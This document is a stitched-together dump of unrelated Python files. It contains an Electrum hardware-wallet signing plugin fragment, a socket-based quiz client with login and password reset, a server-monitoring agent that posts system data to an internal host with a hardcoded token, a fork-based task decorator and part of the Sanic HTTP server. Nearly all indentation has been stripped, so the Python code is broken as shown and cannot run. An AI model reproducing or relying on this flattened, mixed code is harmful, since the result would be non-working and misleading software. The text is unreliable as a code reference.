raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
            script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
UserClient.py
|
import socket
import time
import threading
from rwaFiles import *
from verifiers import *
from cipher import *
from colors import *
import getpass
HEADER = 4096
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR =(SERVER, PORT)
FORMAT = "utf-8"
DISCONNECT_MESSAGE = "!DISCONNECT"
print(f"Server : {SERVER}, Port : {PORT}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
timer = qzSettings(1)
stop_threads = False
############################################ Start of Countdown ############################################
def countdown():
global timer
global stop_threads
timer *= 60 # TIMER in minutes * 60 seconds
for i in range(timer):
timer-=1
time.sleep(1)
if stop_threads:
break
cdthread = threading.Thread(target = countdown) # threading target countdown TIMER function
def recv():
return client.recv(4096).decode(FORMAT)
def send_msg(msg):
message = msg.encode(FORMAT)
client.send(message)
print(recv())
condition = 'Start'
while condition == 'Start':
tOrF = True
while tOrF:
condition = input("Enter (a) to (c) to continue, (x) to exit: ")
# validate input
if condition == 'a' or condition =='b' or condition =='c' or condition =='x':
tOrF = False
else:
print("Please enter a proper value.")
while condition == 'a': #Start Quiz Application
tOrF = True
while tOrF:
print("\nEnter your user ID")
userID = input('\n>>> ')
commaVerifier = checkComma(userID)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
tOrF = True
while tOrF:
print("\nEnter your user Password")
userPass = getpass.getpass('\n>>> ')
commaVerifier = checkComma(userPass)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
login = f"{condition},{userID},{userPass}"
send_msg(login)
condition = 'attempt'
while condition == 'attempt':
condition = recv()
if condition == "User does not exist. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit" or condition == "User exists but wrong password. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
elif condition == "User does not have anymore attempts left. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit" or condition == "User exists but wrong password. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
elif condition == "Login successful.":
print(condition)
userInput = chooseQuizForUser()
if userInput == "View Previous Attempts":
send_msg(userInput)
print(recv())
condition = 'Start'
elif userInput == "Back to previous menu":
send_msg(userInput)
print(recv())
condition = 'Start'
elif userInput == "Exit":
send_msg(DISCONNECT_MESSAGE)
break
else:
send_msg(userInput)
quizInformation = recv()
sections = quizInformation.split(sep='|')
course = sections[0]
module = sections[1]
quizName = sections[2]
questions = sections[3]
individualQuestion = questions.split(sep='&&')
print(f"Course Name: {course}\nModule Name: {module}\nAssessment Component: {quizName}")
cdthread.start() # initiate threading function
print(styleStr((f"Time allowed: {qzSettings(1)} minute(s)."),rgb=(255,200,100)))# get timer from quiz setting
noOfQns = (len(individualQuestion))
answerList = ["0\n"] * noOfQns # IMPT
condition = 'startQuiz'
while condition == 'startQuiz':
qnNum = 0
while qnNum < noOfQns-1: #maybe put a -1 to noofqns
qnNum += 1
if individualQuestion[qnNum] == '':
pass
else:
qnPool = individualQuestion[qnNum].split(sep=',')
print(f'\n\tQuestion {qnNum}: '+qnPool[0]+'\n')
print(f'\ta) {qnPool[1]}\n\tb) {qnPool[2]}\n\tc) {qnPool[3]}\n\td) {qnPool[4]}\n')
usrAns = quizOption(qnNum,noOfQns-1)
if qnNum < noOfQns:
if usrAns == 'N':
qnNum += 0
elif usrAns == 'P':
if qnNum <=0:
pass
else:
qnNum -= 2
else:
answerList[qnNum] = usrAns
elif qnNum >= noOfQns:
print()
if timer == 0: # if TIMER reaches 0, auto submit quiz
print("You have ran out of time. Voiding this attempt.")
print("DISCONNECTING...")
time.sleep(3)
send_msg(DISCONNECT_MESSAGE)
exit()
qnNumber = 0
while qnNumber < noOfQns-1:
qnNumber += 1
qnPool = individualQuestion[qnNumber].split(sep=',')
print(f'\n\tQuestion {qnNumber}: '+qnPool[0]+'\n')
print(f'\ta) {qnPool[1]}\n\tb) {qnPool[2]}\n\tc) {qnPool[3]}\n\td) {qnPool[4]}\n\t(Your Answer) >>> {answerList[qnNumber]}')
condition = 'endQuiz'
while condition == 'endQuiz':
tOrF = True
while tOrF == True:
submission = input(styleStr(("\nEnter 0 to submit or 1 to make changes: "),rgb=(255,200,100))) # ask user to confirm submission or to change answer
if submission == "0":
tOrF = False
condition = 'printResults'
answerString = ''
for i in answerList:
answerString += f',{i}'
send_msg(answerString)
elif submission == "1":
tOrF = False
condition = 'startQuiz'
else:
print("Please enter a valid input.")
tOrF = True
while condition == 'printResults':
markAndPercentage = recv() # RECEIVE MESSAGE HERE
mApList = markAndPercentage.split(sep=',') # mApList stands for markAndPercentage's List
totalMarks = mApList[0]
percentage = float(mApList[1])
print(f'\nTotal Marks: {totalMarks}')
print(f"\nYou've scored {percentage}%.")
if percentage >= 50 and percentage < 60: # print out grade
print(styleStr(("That's a D grade. You can do better!"),rgb=(255,48,48)))
elif percentage >= 60 and percentage < 70:
print(styleStr(("That's a C grade. Keep it up!"),rgb=(48,249,255)))
elif percentage >= 70 and percentage < 80:
print(styleStr(("That's a B grade. Almost there!"),rgb=(235,255,48)))
elif percentage >= 80 and percentage <= 100:
print(styleStr(("That's an A grade. Good job!"),rgb=(55,255,48)))
else:
print("You have failed the test. Study harder!")
condition = 'askToTryAgain'
while condition == 'askToTryAgain':
tOrF = True
while tOrF:
userInput = input("Do you want to try again (y|n)? ")
tOrF = yOrN(userInput)
if userInput == 'y':
send_msg(userInput)
condition = "attempt"
# start new quiz
else:
stop_threads = True
cdthread.join()
send_msg(DISCONNECT_MESSAGE)
break
while condition == 'b': #Register User Account
# ask for username
tOrF = True
while tOrF:
print("\nEnter your desired user ID")
userID = input('\n>>> ')
commaVerifier = checkComma(userID)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
# ask for Password
tOrF = True
while tOrF:
print("\nEnter your user Password")
userPass = input('\n>>> ')
tOrF = passcheck(userPass)
encryptedPass = encrypt(userPass)
tOrF = True
while tOrF == True:
scrtQn = input("\nPlease enter a secret recovery question.\n>>> ") # ask for secret question
verifyScrtQn = checkComma(scrtQn)
if verifyScrtQn == True:
print("Please do not enter a comma in your question.")
tOrF = True
else:
tOrF = False
tOrF = True
while tOrF == True:
scrtAns = input("\nPlease enter your secret question's answer.\n>>> ") # ask for secret question's answer
verifyScrtAns = checkComma(scrtAns)
if verifyScrtAns == True:
print("Please do not enter a comma in your answer.")
tOrF = True
else:
tOrF = False
# add the items together
newUser = f"{condition},{userID},{encryptedPass},{scrtQn},{scrtAns}"
#send to Server
send_msg(newUser)
condition = recv()
if condition == "\nUser ID is already taken. Sending you back to main menu.\n***Welcome to Quiz Application***\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
else:
print(condition)
condition = 'Start'
while condition == 'c': #Reset Password
# ask for user ID
tOrF = True
while tOrF:
print("\nEnter your user ID")
userID = input('\n>>> ')
commaVerifier = checkComma(userID)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
# SEND user ID to server
resetPass = f"{condition},{userID}"
send_msg(resetPass)
# RECEIVE CONDITIONAL text from Server
condition = recv()
# if CONDITIONAL text == "User does not exist. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
if condition == "User does not exist. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
# else:
else:
# print secret question
print('\n'+condition)
# ask for secret answer
secretAnswer = input("\n>>> ")
# SEND secret answer to Server
send_msg(secretAnswer)
# RECEIVE CONDITIONAL text from server
condition = recv()
# if CONDITIONAL text == 'NO':
if condition == 'Wrong answer. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit"':
# print CONDITIONAL text; basically send back to main Menu
print(condition)
# else:
else:
# ask for new Password
print('\n'+condition)
tOrF = True
while tOrF:
userPass = input("\n>>> ")
                    # verify password strength; if it is too weak, ask for the password again
tOrF = passcheck(userPass)
# encrypt Password
encryptedPass = encrypt(userPass)
# SEND new encrypted password to server
send_msg(encryptedPass)
# RECEIVE confirmation text back from Server
confirmation = recv()
print(confirmation)
# go to main Menu
condition = 'Start'
while condition == 'x': # go back to main menu
send_msg('x')
break
#send_msg(DISCONNECT_MESSAGE)
|
adminset_agent.py
|
#!/usr/bin/env python
# coding=utf-8
import os, re, platform, socket, time, json, threading
import psutil, schedule, requests
from subprocess import Popen, PIPE
import logging
AGENT_VERSION = "0.21"
token = 'HPcWR7l4NJNJ'
server_ip = '192.168.47.130'
def log(log_name, path=None):
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%Y%m%d %H:%M:%S',
filename=path+log_name,
filemode='ab+')
return logging.basicConfig
log("agent.log", "/opt/adminset/client/")
def get_ip():
try:
hostname = socket.getfqdn(socket.gethostname())
ipaddr = socket.gethostbyname(hostname)
except Exception as msg:
print(msg)
ipaddr = ''
return ipaddr
def get_dmi():
p = Popen('dmidecode', stdout=PIPE, shell=True)
stdout, stderr = p.communicate()
return stdout
def parser_dmi(dmidata):
pd = {}
line_in = False
for line in dmidata.split('\n'):
if line.startswith('System Information'):
line_in = True
continue
if line.startswith('\t') and line_in:
k,v = [i.strip() for i in line.split(':')]
pd[k] = v
else:
line_in = False
return pd
def get_mem_total():
cmd = "grep MemTotal /proc/meminfo"
p = Popen(cmd, stdout=PIPE, shell = True)
data = p.communicate()[0]
mem_total = data.split()[1]
memtotal = int(round(int(mem_total)/1024.0/1024.0, 0))
return memtotal
def get_cpu_model():
cmd = "cat /proc/cpuinfo"
p = Popen(cmd, stdout=PIPE, stderr = PIPE, shell = True)
stdout, stderr = p.communicate()
return stdout
def get_cpu_cores():
cpu_cores = {"physical": psutil.cpu_count(logical=False) if psutil.cpu_count(logical=False) else 0, "logical": psutil.cpu_count()}
return cpu_cores
def parser_cpu(stdout):
groups = [i for i in stdout.split('\n\n')]
group = groups[-2]
cpu_list = [i for i in group.split('\n')]
cpu_info = {}
for x in cpu_list:
k, v = [i.strip() for i in x.split(':')]
cpu_info[k] = v
return cpu_info
def get_disk_info():
ret = []
cmd = "fdisk -l|egrep '^Disk\s/dev/[a-z]+:\s\w*'"
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
for i in stdout.split('\n'):
disk_info = i.split(",")
if disk_info[0]:
ret.append(disk_info[0])
return ret
def post_data(url, data):
try:
r = requests.post(url, data)
if r.text:
logging.info(r.text)
else:
logging.info("Server return http status code: {0}".format(r.status_code))
except Exception as msg:
logging.info(msg)
return True
def asset_info():
data_info = dict()
data_info['memory'] = get_mem_total()
data_info['disk'] = str(get_disk_info())
cpuinfo = parser_cpu(get_cpu_model())
cpucore = get_cpu_cores()
data_info['cpu_num'] = cpucore['logical']
data_info['cpu_physical'] = cpucore['physical']
data_info['cpu_model'] = cpuinfo['model name']
data_info['ip'] = get_ip()
data_info['sn'] = parser_dmi(get_dmi())['Serial Number']
data_info['vendor'] = parser_dmi(get_dmi())['Manufacturer']
data_info['product'] = parser_dmi(get_dmi())['Version']
data_info['osver'] = platform.linux_distribution()[0] + " " + platform.linux_distribution()[1] + " " + platform.machine()
data_info['hostname'] = platform.node()
data_info['token'] = token
data_info['agent_version'] = AGENT_VERSION
return json.dumps(data_info)
def asset_info_post():
pversion = platform.python_version()
pv = re.search(r'2.6', pversion)
if not pv:
osenv = os.environ["LANG"]
os.environ["LANG"] = "us_EN.UTF8"
logging.info('Get the hardwave infos from host:')
logging.info(asset_info())
logging.info('----------------------------------------------------------')
post_data("http://{0}/cmdb/collect".format(server_ip), asset_info())
if not pv:
os.environ["LANG"] = osenv
return True
def get_sys_cpu():
sys_cpu = {}
cpu_time = psutil.cpu_times_percent(interval=1)
sys_cpu['percent'] = psutil.cpu_percent(interval=1)
sys_cpu['lcpu_percent'] = psutil.cpu_percent(interval=1, percpu=True)
sys_cpu['user'] = cpu_time.user
sys_cpu['nice'] = cpu_time.nice
sys_cpu['system'] = cpu_time.system
sys_cpu['idle'] = cpu_time.idle
sys_cpu['iowait'] = cpu_time.iowait
sys_cpu['irq'] = cpu_time.irq
sys_cpu['softirq'] = cpu_time.softirq
sys_cpu['guest'] = cpu_time.guest
return sys_cpu
def get_sys_mem():
sys_mem = {}
mem = psutil.virtual_memory()
sys_mem["total"] = mem.total/1024/1024
sys_mem["percent"] = mem.percent
sys_mem["available"] = mem.available/1024/1024
sys_mem["used"] = mem.used/1024/1024
sys_mem["free"] = mem.free/1024/1024
sys_mem["buffers"] = mem.buffers/1024/1024
sys_mem["cached"] = mem.cached/1024/1024
return sys_mem
def parser_sys_disk(mountpoint):
partitions_list = {}
d = psutil.disk_usage(mountpoint)
partitions_list['mountpoint'] = mountpoint
partitions_list['total'] = round(d.total/1024/1024/1024.0, 2)
partitions_list['free'] = round(d.free/1024/1024/1024.0, 2)
partitions_list['used'] = round(d.used/1024/1024/1024.0, 2)
partitions_list['percent'] = d.percent
return partitions_list
def get_sys_disk():
sys_disk = {}
partition_info = []
partitions = psutil.disk_partitions()
for p in partitions:
partition_info.append(parser_sys_disk(p.mountpoint))
sys_disk = partition_info
return sys_disk
# Collect the sent/received byte counters for every network interface
def get_nic():
    key_info = psutil.net_io_counters(pernic=True).keys() # NIC names
    recv = {}
    sent = {}
    for key in key_info:
        recv.setdefault(key, psutil.net_io_counters(pernic=True).get(key).bytes_recv) # bytes received per NIC
        sent.setdefault(key, psutil.net_io_counters(pernic=True).get(key).bytes_sent) # bytes sent per NIC
    return key_info, recv, sent
# Compute per-second transfer rates from two samples taken one second apart
def get_nic_rate(func):
    key_info, old_recv, old_sent = func() # counters sampled one second ago
    time.sleep(1)
    key_info, now_recv, now_sent = func() # counters sampled now
    net_in = {}
    net_out = {}
    for key in key_info:
        net_in.setdefault(key, (now_recv.get(key) - old_recv.get(key)) / 1024) # receive rate in KB/s
        net_out.setdefault(key, (now_sent.get(key) - old_sent.get(key)) / 1024) # send rate in KB/s
    return key_info, net_in, net_out
def get_net_info():
net_info = []
key_info, net_in, net_out = get_nic_rate(get_nic)
for key in key_info:
in_data = net_in.get(key)
out_data = net_out.get(key)
net_info.append({"nic_name": key, "traffic_in": in_data, "traffic_out": out_data})
return net_info
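# --- Hedged example (not part of the original agent) -------------------------
# Illustrative only: shows how the two-sample helpers above can be used on
# their own. get_nic_rate() samples the per-NIC counters twice, one second
# apart, and returns the difference in KB/s. The function name below is an
# illustrative assumption and is never called by the agent itself.
def print_nic_rates():
    nics, kb_in, kb_out = get_nic_rate(get_nic)
    for nic in nics:
        print("{0}: in {1} KB/s, out {2} KB/s".format(nic, kb_in.get(nic), kb_out.get(nic)))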
def agg_sys_info():
logging.info('Get the system infos from host:')
sys_info = {'hostname': platform.node(),
'cpu': get_sys_cpu(),
'mem': get_sys_mem(),
'disk': get_sys_disk(),
'net': get_net_info(),
'token': token}
logging.info(sys_info)
json_data = json.dumps(sys_info)
logging.info('----------------------------------------------------------')
post_data("http://{0}/monitor/received/sys/info/".format(server_ip), json_data)
return True
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def get_pid():
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
pid = str(os.getpid())
with open(BASE_DIR+"/adminsetd.pid", "wb+") as pid_file:
pid_file.writelines(pid)
if __name__ == "__main__":
get_pid()
asset_info_post()
time.sleep(1)
agg_sys_info()
schedule.every(3600).seconds.do(run_threaded, asset_info_post)
schedule.every(300).seconds.do(run_threaded, agg_sys_info)
while True:
schedule.run_pending()
time.sleep(1)
|
task.py
|
# -*- coding: UTF-8 -*-
#
# Copyright © 2016 Alex Forster. All rights reserved.
# This software is licensed under the 3-Clause ("New") BSD license.
# See the LICENSE file for details.
#
import sys
import os
import time
import functools
import threading
import multiprocessing
import concurrent.futures
import six
from tblib.pickling_support import pickle_traceback, unpickle_traceback
from . import util
_pid = None
""":type: int"""
_thread = None
""":type: threading.Thread"""
_tasks = None
""":type: dict[int, tuple[multiprocessing.Connection, multiprocessing.Connection, concurrent.futures.Future]]"""
def _worker():
global _pid, _thread, _tasks
while True:
for child_pid, task in six.iteritems(_tasks.copy()):
future = task[0]
parent = task[1]
parent_ex = task[2]
if parent.poll():
try:
result = parent.recv()
parent.close()
parent_ex.close()
future.set_result(result)
del _tasks[child_pid]
continue
except EOFError:
pass
finally:
try:
os.waitpid(child_pid, 0)
except OSError:
pass
if parent_ex.poll():
try:
_, ex_value, ex_traceback = parent_ex.recv()
ex_traceback = unpickle_traceback(*ex_traceback)
parent.close()
parent_ex.close()
if six.PY2:
ex = ex_value
future.set_exception_info(ex, ex_traceback)
elif six.PY3:
ex = ex_value.with_traceback(ex_traceback)
future.set_exception(ex)
del _tasks[child_pid]
continue
except EOFError:
pass
finally:
try:
os.waitpid(child_pid, 0)
except OSError:
pass
time.sleep(0.001)
def _future(child_pid, parent, parent_ex):
""" :type parent: multiprocessing.Connection
:type parent_ex: multiprocessing.Connection
:rtype future: concurrent.futures.Future
"""
global _pid, _thread, _tasks
if _pid != os.getpid():
_tasks = {}
_pid = os.getpid()
_thread = threading.Thread(target=_worker, name='inparallel-{}'.format(os.getpid()))
_thread.setDaemon(True)
_thread.start()
future = concurrent.futures.Future()
future.set_running_or_notify_cancel()
_tasks[child_pid] = (future, parent, parent_ex)
return future
@util.decorator
def task(fn):
@six.wraps(fn)
def wrapper(*args, **kwargs):
global _pid, _thread, _tasks
parent, child = multiprocessing.Pipe()
parent_ex, child_ex = multiprocessing.Pipe()
child_pid = os.fork()
if child_pid == 0:
try:
child.send(fn(*args, **kwargs))
except Exception:
ex_type, ex_value, ex_traceback = sys.exc_info()
_, ex_traceback = pickle_traceback(ex_traceback)
child_ex.send((ex_type, ex_value, ex_traceback))
finally:
child.close()
child_ex.close()
if _thread:
util.raiseExceptionInThread(_thread, SystemExit)
_thread.join()
os._exit(0)
return _future(child_pid, parent, parent_ex)
return wrapper
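# --- Hedged usage sketch (not part of the original module) -------------------
# Shows how a caller might use the @task decorator defined above: the
# decorated call forks a child process and immediately returns a
# concurrent.futures.Future, which the background watcher thread resolves
# once the child pipes back its result (or a pickled traceback). The names
# `_example_usage` and `square` are illustrative assumptions only.
def _example_usage():
    @task
    def square(x):
        return x * x
    future = square(6)      # returns immediately; the work runs in a forked child
    return future.result()  # blocks until the watcher thread sets the result (36)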
|
server.py
|
import asyncio
import os
import traceback
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser
from httptools.parser.errors import HttpParserError
from multidict import CIMultiDict
from sanic.exceptions import (
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections or set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
        :return: ``True`` if the connection should be kept alive, ``False`` otherwise
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = time()
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = time() - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
